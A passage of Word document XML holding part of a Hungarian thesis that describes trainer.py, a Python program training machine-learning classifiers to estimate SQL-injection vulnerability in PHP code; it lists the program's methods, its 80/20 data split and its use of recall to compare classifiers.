      </w:r>
      <w:r w:rsidR="002447D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">X </w:t>
      </w:r>
      <w:r w:rsidR="002447D4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">és </w:t>
      </w:r>
      <w:r w:rsidR="002447D4">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>y</w:t>
      </w:r>
      <w:r w:rsidR="002447D4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> változókat lementi egy-egy </w:t>
      </w:r>
      <w:r w:rsidR="00954C9D">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>num</w:t>
      </w:r>
      <w:r w:rsidR="002447D4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>py fájlba.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E6C508" w14:textId="77777777" w:rsidR="00161741" w:rsidRDefault="000C2677" w:rsidP="00B263AD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r w:rsidR="007C027B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> program utolsó és legfontosabb </w:t>
      </w:r>
      <w:r w:rsidR="002A7292">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>lépésé</w:t>
      </w:r>
      <w:r w:rsidR="007C027B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ben a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00BA59D5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>trainer.py</w:t>
      </w:r>
      <w:r w:rsidR="007C027B" w:rsidRPr="00BA59D5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-on</w:t>
      </w:r>
      <w:r w:rsidR="007C027B">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> be</w:t>
      </w:r>
      <w:r w:rsidR="00280928">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">lül </w:t>
      </w:r>
      <w:r w:rsidR="00DF711A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hajtja végre a program legfőbb feladatát: betanítja a</w:t>
      </w:r>
      <w:r w:rsidR="002D041E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> választott </w:t>
      </w:r>
      <w:r w:rsidR="00DF711A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">algoritmust és </w:t>
      </w:r>
      <w:r w:rsidR="00280928" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ad</w:t>
      </w:r>
      <w:r w:rsidR="00F85C68">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280928" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egy </w:t>
      </w:r>
      <w:r w:rsidR="00F85C68">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">becslést </w:t>
      </w:r>
      <w:r w:rsidR="00F67757">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>egy ismeretlen</w:t>
      </w:r>
      <w:r w:rsidR="00042A6E">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP</w:t>
      </w:r>
      <w:r w:rsidR="00F85C68">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00280928" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>kód SQL injectionbeli sebezhetőségével kapcsolatban.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6939CAD7" w14:textId="263344E5" w:rsidR="00CA505F" w:rsidRDefault="00CA505F" w:rsidP="00B263AD">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Implementált metódusai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FEB6AE" w14:textId="62BA571C" w:rsidR="00985098" w:rsidRPr="009C7780" w:rsidRDefault="001D5C35" w:rsidP="00985098">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00782F3A">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Metódus, amely </w:t>
      </w:r>
      <w:r w:rsidR="000D03BA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">egyrészt beolvassa </w:t>
      </w:r>
      <w:r w:rsidR="00856EB4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">parancssori argumentumokon keresztül </w:t>
      </w:r>
      <w:r w:rsidR="000D03BA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a „toimpor</w:t>
      </w:r>
      <w:r w:rsidR="00981B98">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>tX</w:t>
      </w:r>
      <w:r w:rsidR="000D03BA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>” numpy fáj</w:t>
      </w:r>
      <w:r w:rsidR="00981B98">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00856EB4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (-z)</w:t>
      </w:r>
      <w:r w:rsidR="000D03BA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amiket a classifier2 metódusnak ad át, másrészt </w:t>
      </w:r>
      <w:r w:rsidR="00B263AD" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">beolvassa </w:t>
      </w:r>
      <w:r w:rsidR="00856EB4">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">hasonló módon (-x, -y) </w:t>
      </w:r>
      <w:r w:rsidR="00B263AD" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00343D22" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>„test</w:t>
      </w:r>
      <w:r w:rsidR="004D5EF7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>X</w:t>
      </w:r>
      <w:r w:rsidR="00343D22" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="004D5EF7">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> „testy”</w:t>
      </w:r>
      <w:r w:rsidR="00343D22" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B263AD" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="00343D22" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ump</w:t>
      </w:r>
      <w:r w:rsidR="00B263AD" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>y fájlokat</w:t>
      </w:r>
      <w:r w:rsidR="00763F7C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> is</w:t>
      </w:r>
      <w:r w:rsidR="00B263AD" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, amiket </w:t>
      </w:r>
      <w:r w:rsidR="00416BE3" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>feloszt</w:t>
      </w:r>
      <w:r w:rsidR="00B263AD" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az algoritmus tanítására </w:t>
      </w:r>
      <w:r w:rsidR="000C1FAF" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="000C1FAF" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>trainX, train</w:t>
      </w:r>
      <w:r w:rsidR="00B43404" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="000C1FAF" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00B263AD" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>és tesztelésére</w:t>
      </w:r>
      <w:r w:rsidR="000C1FAF" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="000C1FAF" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>testX, testY</w:t>
      </w:r>
      <w:r w:rsidR="000C1FAF" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00F1332C" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> ~80</w:t>
      </w:r>
      <w:r w:rsidR="00660000" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>~</w:t>
      </w:r>
      <w:r w:rsidR="00F1332C" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>20% arányban</w:t>
      </w:r>
      <w:r w:rsidR="009A51E2" w:rsidRPr="00CA505F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="007D3C7C" w:rsidRPr="000C52EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>A felügyelt tanulás 5 fő algoritmusára</w:t>
      </w:r>
      <w:r w:rsidR="000C52EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> -…-</w:t>
      </w:r>
      <w:r w:rsidR="007D3C7C" w:rsidRPr="000C52EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00763473" w:rsidRPr="000C52EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">van meghívva </w:t>
      </w:r>
      <w:r w:rsidR="007D3C7C" w:rsidRPr="000C52EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="000C52EB" w:rsidRPr="000C52EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>classifier</w:t>
      </w:r>
      <w:r w:rsidR="007D3C7C" w:rsidRPr="000C52EB">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> metódus</w:t>
      </w:r>
      <w:r w:rsidR="002E6BFA" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00985098" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Az általa visszaadott metrikák segítségével </w:t>
      </w:r>
      <w:r w:rsidR="004179ED" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="005D142C" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r w:rsidR="004179ED" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00985098" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>össze</w:t>
      </w:r>
      <w:r w:rsidR="004179ED" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>hasonlítja</w:t>
      </w:r>
      <w:r w:rsidR="00985098" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> az algoritmusokat, aminek az eredményét a 3.</w:t>
      </w:r>
      <w:r w:rsidR="009556A8" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00985098" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="003802C6" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00985098" w:rsidRPr="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>s ábra táblázata mutatja.</w:t>
      </w:r>
      <w:r w:rsidR="00D47508">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ekkor automatikusan kiválasztja a legnagyobb értékhez tartozó osztályozót</w:t>
      </w:r>
      <w:r w:rsidR="000F07C0">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és meghívja rá a classifier2 metódust</w:t>
      </w:r>
      <w:r w:rsidR="000F07C0" w:rsidRPr="009C7780">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F46181" w14:textId="6855E6DB" w:rsidR="002A0DDF" w:rsidRDefault="00107BC7" w:rsidP="004246AA">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">test_bmodel: </w:t>
      </w:r>
      <w:r w:rsidR="00E12E9E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">Metódus, amely </w:t>
      </w:r>
      <w:r w:rsidR="00B04349">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">visszaadja a </w:t>
      </w:r>
      <w:r w:rsidR="00773B36">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">paraméterként megadott </w:t>
      </w:r>
      <w:r w:rsidR="00B04349">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>algoritmus hatékonyságának számát</w:t>
      </w:r>
      <w:r w:rsidR="00A84A1F">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> egy [0;1] intervallumon</w:t>
      </w:r>
      <w:r w:rsidR="00B04349">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E12E9E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r w:rsidR="00773B36">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">szintén </w:t>
      </w:r>
      <w:r w:rsidR="00E12E9E">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">paraméterként megadott teszt adatok által. </w:t>
      </w:r>
      <w:r w:rsidR="001B7784" w:rsidRPr="004246AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>Már említettem</w:t>
      </w:r>
      <w:r w:rsidR="009A51E2" w:rsidRPr="004246AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a korábbi fejezetben,</w:t>
      </w:r>
      <w:r w:rsidR="00E5074B" w:rsidRPr="004246AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> hogy</w:t>
      </w:r>
      <w:r w:rsidR="009A51E2" w:rsidRPr="004246AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> a Confusion Matrix Recall értéke a leghasznosabb, ha egy </w:t>
      </w:r>
      <w:r w:rsidR="009A51E2" w:rsidRPr="004246AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>kód sérülékenységéről van sz</w:t>
      </w:r>
      <w:r w:rsidR="002F67CE" w:rsidRPr="004246AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">ó, így ezt a metrikát </w:t>
      </w:r>
      <w:r w:rsidR="000D0EA5">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>használom</w:t>
      </w:r>
      <w:r w:rsidR="002F67CE" w:rsidRPr="004246AA">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00852E5C">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a hatékonyságméréshez.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8FB7C4" w14:textId="76863D51" w:rsidR="00481BF5" w:rsidRPr="000069EC" w:rsidRDefault="009E318A" w:rsidP="00202E4E">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>classifier:</w:t>
      </w:r>
      <w:r w:rsidR="00C93EB5" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metódus, amely </w:t>
      </w:r>
      <w:r w:rsidR="004739A0" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a paraméterben megadott tanító és tesztelő adatok alapján képzi és értékeli ki a szintén paraméterbeli osztályozót.</w:t>
      </w:r>
      <w:r w:rsidR="00820783" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kimenet</w:t>
      </w:r>
      <w:r w:rsidR="00DA2366" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>e a</w:t>
      </w:r>
      <w:r w:rsidR="008E1AE8" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> test_bmodel által visszaadott metrika</w:t>
      </w:r>
      <w:r w:rsidR="00F95138" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, valamint kiírja, hogy </w:t>
      </w:r>
      <w:r w:rsidR="00202E4E" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>a ciklus hanyadik futásnál jár</w:t>
      </w:r>
      <w:r w:rsidR="00F95138" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>, a korábban említett metrikát és az osz</w:t>
      </w:r>
      <w:r w:rsidR="000928E2" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00F95138" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>ályozó</w:t>
      </w:r>
      <w:r w:rsidR="000928E2" w:rsidRPr="000069EC">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>t.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DA5F639" w14:textId="457CF15C" w:rsidR="00A320BE" w:rsidRPr="00A320BE" w:rsidRDefault="006339EB" w:rsidP="00A320BE">
      <w:pPr>
        <w:pStyle w:val="Listaszerbekezds"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="1134" w:hanging="283"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>classifier2:</w:t>
      </w:r>
      <w:r w:rsidR="001C3B79">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Metódus, amely </w:t>
      </w:r>
      <w:r w:rsidR="002C4BDF">
        <w:rPr>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">a paraméterként megadott osztályozóval </w:t>
      </w:r>
      <w:r w:rsidR="00A90FA1">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">becslést ad a </w:t>
      </w:r>
      <w:r w:rsidR="002C4BDF">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">szintén </w:t>
      </w:r>
      <w:r w:rsidR="00A90FA1">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">megadott </w:t>
      </w:r>
      <w:r w:rsidR="00A90FA1">
        <w:rPr>
          <w:i/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">X </w:t>
      </w:r>
      <w:r w:rsidR="00A90FA1">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>vektor</w:t>
      </w:r>
      <w:r w:rsidR="009158F4">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> sérülékenységével</w:t>
      </w:r>
      <w:r w:rsidR="00A90FA1" w:rsidRPr="00D47FAE">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> kapcsolatban.</w:t>
      </w:r>
      <w:r w:rsidR="00353B93">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Kiírja többek között </w:t>
      </w:r>
      <w:r w:rsidR="007A3D08">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">az osztályozót, </w:t>
      </w:r>
      <w:r w:rsidR="007A3D08">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>az osztályozás eredményét</w:t>
      </w:r>
      <w:r w:rsidR="007A3D08">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00353B93">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>annak a valószínűségét, hogy a vektor sérülékeny</w:t>
      </w:r>
      <w:r w:rsidR="009B2779">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> és a</w:t>
      </w:r>
      <w:r w:rsidR="00353B93">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> valószínűségét, hogy nem sérülékeny.</w:t>
      </w:r>
      <w:r w:rsidR="00551062">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve"> A 3.</w:t>
      </w:r>
      <w:r w:rsidR="00E73EB1">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidR="00551062">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007D0343">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00551062">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t xml:space="preserve">s ábra </w:t>
      </w:r>
      <w:r w:rsidR="00771646">
        <w:rPr>
          <w:iCs/>
          <w:lang w:val="hu-HU"/>
        </w:rPr>
        <w:t>utolsó</w:t>
      </w:r>
